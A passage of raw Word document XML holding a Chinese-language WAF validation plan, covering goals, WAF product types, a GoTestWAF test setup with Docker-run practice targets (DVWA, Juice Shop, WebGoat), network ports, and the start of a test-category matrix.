          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58098239">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104AD101">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE2BC46">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B3EA16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3300B133">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3720D5DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E086BFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BED5AD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BFB9B00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="798512CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39982BB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3BD8D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F3D77E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一、方案概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A087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1.1 背景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A237EC9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="691B35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Web 应用防火墙（WAF）作为 Web 应用的第一道防线，其有效性直接影响业务安全。本方案旨在建立一套标准化的 WAF 安全验证流程，通过系统化的测试方法评估 WAF 的防护能力，发现配置缺陷，并提供优化建议。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25926970">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26948DB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1.2 目标</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF35679">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="207F2A3E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评估 WAF 对常见 Web 攻击的检测和拦截能力</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585594D9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验证 WAF 配置的正确性和完整性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37389FD0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发现 WAF 规则覆盖的盲区</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D97B5DD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评估 WAF 的误报率</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B05D33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建立 WAF 安全基线，支持持续改进</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227AD3A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7976A4F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1.3 适用范围</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7AF14A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48FCF26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本方案适用于以下 WAF 类型：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D6AF75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑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5253"/>
      </w:tblGrid>
      <w:tr w14:paraId="6FAB7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58D3579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WAF 类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="692BAD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示例产品</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2252B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017652C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硬件 WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7C3616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Imperva、F5 ASM、绿盟、安恒等</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="60050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6695268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软件 WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="1732A3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ModSecurity、Nginx WAF、OpenResty WAF 等</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="41B25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673716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云 WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="79A28E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阿里云 WAF、腾讯云 WAF、AWS WAF、Cloudflare 等</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="09797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0E6261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API 网关</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="5546E9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Kong、APISIX、Wallarm API Firewall 等</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D374E9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AA28A57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39B2E9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0B51AAAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E099A4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二、验证环境准备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FABBBC9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FBDBE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环境架构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C685B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C2D9B1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┌─────────────────┐     ┌─────────────────┐     ┌─────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640157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测试执行机    │────▶│   WAF 设备      │────▶│   目标应用      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3713E3C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GoTestWAF      │     │  (被测对象)     │     │  (测试靶场)     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A265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└─────────────────┘     └─────────────────┘     └─────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A94B923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DA9311">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F53AB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 环境要求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55573E9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55302FDC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2.2.1 测试执行机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D229493">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑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103"/>
        <w:gridCol w:w="2897"/>
      </w:tblGrid>
      <w:tr w14:paraId="6F48D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261596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项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="3C6679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最低要求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="2E2198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推荐配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2EB0D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4476AF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操作系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="491872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Windows 10 / Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="63D583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Windows 11 / Ubuntu 22.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4C8DC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421278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CPU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="2F8D47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 核</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="53B9C5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 核以上</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="63FCA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07DD8B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内存</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2BFB14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 GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="43DD80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 GB 以上</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="30135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448300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磁盘</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="6AFCCF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 GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="45506D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50 GB 以上</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="28874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71BC45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网络</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="06CF24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可访问目标 WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="44BBC4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低延迟网络环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BCAC2C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB799A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11390914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2.2.2 测试靶场</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2CE9EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03D3C6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选择以下任一方案作为测试目标：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B0CCA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A2737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方案 A：专用靶场</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF1D5E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DVWA 靶场</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7DC3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docker run -d -p 80:80 vulnerables/web-dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5398D890">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F8010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OWASP Juice Shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB3DDE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docker run -d -p 3000:3000 bkimminich/juice-shop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CA8110">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1493ED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WebGoat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CEF24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docker run -d -p 8080:8080 webgoat/webgoat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7331AA55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1649E7B9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535322C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方案 B：测试环境应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690A6E50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使用预生产环境的测试应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59905B56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确保应用包含常见功能点（登录、查询、文件上传等）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C27F8C4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CAD15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方案 C：模拟后端服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CB5B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简单的响应服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB3BA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docker run -d -p 8080:80 kennethreitz/httpbin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031223B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="410C17AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8F7FD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2.3 工具准备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CEFCF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D7ECC9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下载 GoTestWAF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387CDC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wget </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
        <w:t>https://github.com/wallarm/gotestwaf/releases/latest/download/gotestwaf-linux-amd64</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5EB183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chmod +x gotestwaf-linux-amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E8C95B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592533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验证安装</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5AEB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./gotestwaf-linux-amd64 --help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4146E761">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0AE26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准备测试用例目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EBD2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mkdir -p testcases/custom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1016CB4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3543E724">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6827DBD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2.4 网络配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DF9F0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7025CF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确保以下网络连通性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D96291">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑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016"/>
        <w:gridCol w:w="1016"/>
        <w:gridCol w:w="1990"/>
      </w:tblGrid>
      <w:tr w14:paraId="2C7C5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08EC83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源</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="618A50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目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="63988D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端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="026C59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用途</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="38596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40844C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测试执行机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="72E961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WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="294D6B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80/443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="43630F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HTTP/HTTPS 测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0C377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69B093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测试执行机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="0C8D44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WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="717621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9000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F4FD"/>
          </w:tcPr>
          <w:p w14:paraId="060C59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gRPC 测试（可选）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7E034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4DE55B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WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3E9CE7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目标应用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="29ED0A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应用端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="25B65C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流量转发</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22753D73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52897FF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38BEDB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1C1F923A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E9C32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三、验证内容与方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2E9C87">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59259F2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验证内容矩阵</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191E3E16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑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1416"/>
        <w:gridCol w:w="1016"/>
        <w:gridCol w:w="1016"/>
      </w:tblGrid>
      <w:tr w14:paraId="60A51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486E3C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测试类别</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="4784DE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测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="7909D7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严重程度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="4472C4"/>
          </w:tcPr>
          <w:p w14:paraId="1EE605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测试类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22C4F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45E520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注入攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B777E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SQL 注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="257EAE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高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0C4E00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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5EF61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681184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注入攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
